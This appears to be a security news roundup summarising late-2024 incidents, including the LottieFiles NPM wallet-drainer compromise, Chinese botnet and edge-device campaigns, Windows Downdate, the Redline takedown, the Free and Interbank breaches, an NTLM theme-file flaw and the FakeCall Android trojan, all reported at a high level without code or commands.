Unsuspecting cryptocurrency owners were recently hit by unexpected prompts asking them to connect their cryptocurrency wallets when visiting certain websites that use LottieFiles software-as-a-service platform to help serve animations. If the users connect their wallets as requested, they may inadvertently allow cryptocurrency drainer malware to steal funds and other digital assets from their wallets.

This occurred because an authentication belonging to one of the LottieFiles developers was stolen and subsequently used to upload a poisoned JavaScript code package to the NPM code repository used by millions of developers worldwide. Users of the LottieFiles package unknowingly installed the package which then executed the malicious code hidden inside it. Once executed and the wallet connection is made, the malware connects with a malicious domain at castleservices01[.]com to receive commands for the attack.

According to LottieFiles, only versions 2.0.5, 2.0.6, 2.0.7 of the NPM packages were affected by the breach and these have been removed. Files on other repositories and platforms including Github are not affected. Users of the player are advised to either stay with version 2.0.4 or upgrade to 2.0.8 which are not affected by the issue.

Sophos has published a series of reports on how it has been battling Chinese threat actors for more than 5 years as they targeted networking devices worldwide.

The series of reports, dubbed Pacific Rim, detail the cybersecurity company’s investigation into multiple China-based groups and how they exploit flaws in edge networking devices to install custom malware for the purpose of carrying out surveillance, sabotage, and cyberespionage.

The attacks have targeted well-known manufacturers, including Fortinet, Barracuda, SonicWall, Check Point, D-Link, Cisco, Juniper, NetGear, Sophos, and more. Sophos attributed this activity to multiple Chinese threat actors, known as Dungbeetle (aka Volt Typhoon, Voltzite), Sheathminer (aka APT31, Violet Typhoon), and Grayfly (aka APT41, Brass Typhoon).

The researchers believe that many of the zero-day vulnerabilities used in the attacks are developed by Chinese researchers who not only share them with vendors, but also the Chinese government and associated state-sponsored threat actors.

Researchers have blogged about a Chinese hacking group called Storm-0940 who is building a substantial small office and home office (SOHO) botnet using malware known as Quad7 (aka CovertNetwork-1658 or xlogin). An interesting feature of the attacks by this group is their use of low rate password spraying, where a targeted machine or account is hit with a password spray attack around once a day, a level that is unlikely to trigger any alarms.

However, despite the lethargic rate of initial activity, should the attack result in successful entry, the attacker wastes little time in entering into the device and exploring the network to see what’s available inside. They also perform other activities, which include establishing a better foothold within the network by installing additional malware, opening up a command shell on TCP port 7777, and downloading and installing a SOCKS5 server to operate on TCP port 11288.

The attackers have been known to target devices from various companies including those from TP-Link, ASUS, Ruckus, Axentra, and Zyxel but are particularly successful with TP-Link devices, which provide the bulk of hacked routers in the network of compromised devices.

Chinese hackers are known for targeting internet-connected devices for building botnets. In September 2024, the Federal Bureau of Investigation (FBI) and partner agencies detailed their work against another Chinese threat actor known as Flax Typhoon, which resulted in the demise of a 260,000-device-strong botnet.

A new attack technique can bypass Microsoft’s Driver Signature Enforcement (DSE) on fully patched Windows systems, leading to operating system (OS) downgrade attacks.

The attack involves a Windows OS downgrade technique that SafeBreach security researcher Alon Leviev demonstrated at Black Hat USA 2024 in August, and for which he developed an exploit tool called Windows Downdate. Leviev showed how an attacker, with admin-level access to a system, could tamper with the Windows Update process and revert fully patched Windows components.

The technique allows an attacker to install custom rootkits that can neutralize security controls, hide malicious processes and network activity, maintain persistence and stealth, and more.

Since Leviev’s demonstration, Microsoft has patched two vulnerabilities (CVE-2024-21302 and CVE-2024-38202) that the researcher exploited as part of the attack chain. However, Microsoft has not yet addressed the ability for an attacker with admin access to abuse the Windows Update process itself. A Microsoft spokesperson says the company is “actively developing mitigations to protect against these risks.”

The Dutch National Police revealed on Monday (October 28) that they gained “full access” to all of the servers used by the Redline and Meta infostealers.

“On the 28th of October 2024 the Dutch National Police, working in close cooperation with the FBI and other partners of the international law enforcement task force Operation Magnus, disrupted operation of the Redline and Meta infostealers,” stated a website announcing the activity. “Involved parties will be notified, and legal actions are underway.”

Authorities say they are also in possession of all the Redline and Meta source code, as well as “license servers, REST-API-servers, panels, stealers, and Telegram bots.”

Dutch police revealed that both Meta and Redline shared the same infrastructure, meaning it is likely that the same operators are behind both projects.

Free, France’s second-largest internet service provider (ISP), has confirmed it suffered a cyberattack over the weekend. The ISP made the announcement after purportedly stolen customer information was offered for sale on a cybercrime forum.

Free warned that customers’ personal information was compromised in the incident. The company said the attackers targeted an internal management tool and that the unauthorized access involved “personal data associated with the accounts of certain subscribers.” The affected subscribers have been or will be informed by email, Free said. The ISP added that passwords and bank card details were unaffected, as were the contents of any of its users’ communications.

While Free did not reveal how many customers were impacted by the breach, the incident followed a cybercriminal known as drussellx listing what they claimed were two databases stolen from Free, affecting more than 19 million customers, on a cybercrime forum.

“The data breach affects 19.2 million customers and contains over 5.11 million IBAN numbers. It affects all Free Mobile and Freebox customers, and includes the IBANs of all 5.11 million Freebox subscribers,” the threat actor says.

While New Technology LAN Manager (NTLM) is a technology that Microsoft is set to retire in Windows operating systems, it is still widely used on older Windows systems and as a fallback when Kerberos is unavailable. NTLM is generally regarded as a poor alternative that is insecure and is frequently targeted by attackers to steal NTLM hashes for authentication with servers to gain access.

Microsoft announced NTLM was to be retired back in late 2023 and while that process continues, NTLM also continues to pose a headache for users. The latest NTLM problem was discovered by researchers looking at another vulnerability (CVE-2024-38030 – CVSS 6.5), which was patched by Microsoft back in July 2024.

However, despite the patch, there was still another previously unknown vulnerability in Windows when handling Windows Theme files that could allow an attacker to trigger a network connection to an attacker-controlled server and expose the user’s NTLM credentials in the process. The user simply has to copy the malicious file on the vulnerable system to trigger the issue.

At this time, there is no official CVE number or patch available for this issue. However, the researchers who discovered the issue created unofficial patches if users are willing to take a chance. Alternatively, users can apply a group policy to block the sending of NTLM hashes to remote servers.

The U.S. has charged a Russian national for his alleged role in developing the Redline information-stealing malware.

According to an unsealed criminal complaint from the Western District of Texas, Maxim Rudometov is one of the developers and administrators of Redline, a prevalent infostealer used by cybercriminals. Rudometov regularly accessed and managed Redline, and was associated with various cryptocurrency accounts used to receive and launder payments for the malware. Rudometov is charged with access device fraud, conspiracy to commit computer intrusion, and money laundering.

The unsealed charges and the additional detainment of two unnamed individuals by Dutch National Police are the latest outcomes of Operation Magnus, an international law enforcement operation aimed at disrupting the Redline and Meta infostealers.

A new version of an Android malware called FakeCall has been spotted in the wild. The Trojan is used by attackers to target Android phone users to carry out voice-based phishing (vishing) attacks in order to steal sensitive information relating to banking and financial institutions.

In the new version, the Trojan sets itself up as the default call handler when installed. This allows it to intercept and manage all incoming and outgoing phone calls. The Trojan can intercept calls for many different financial institutions, so if, for example, a victim tries to call their bank, the Trojan will intercept the call and divert it to a phone number controlled by the attacker designed to impersonate the institution being contacted.

The new version also uses the Android Accessibility Service to enable it to control the device UI and initiate fake user input gestures. There’s also a Bluetooth listener and screen monitoring service which are not yet fully implemented, indicating that the Trojan is still in development.

The backdoor functionality has also been improved with several capabilities added to enable the attacker to have better control over the device.

Protection
For the latest protection updates, please visit the Symantec Protection Bulletin.

Interbank, a leading financial institution in Peru, has confirmed it suffered a data breach. The disclosure came after a threat actor leaked data stolen from Interbank online.

“We have identified that some data of a group of clients has been exposed by a third party without our authorization. In light of this situation, we immediately deployed additional security measures to protect the operations and information of our clients,” Interbank said on Wednesday (October 30).

Interbank claims that most of its operations are online and that its clients’ deposits are secure; however, customers have been reporting that the bank’s mobile app and online platforms have stopped working.

It is unclear how many of Interbank’s customers are affected by the breach. However, a threat actor known as kzoldyck claims that they have data belonging to “3 million customers” that includes full names, account IDs, birth dates, addresses, phone numbers, email addresses, and IP addresses, as well as credit card and CVV numbers, credit card expiry dates, information on bank transactions, and other sensitive information, including plaintext credentials. The hacker says they posted samples of the stolen data online after ransom negotiations with Interbank’s management failed.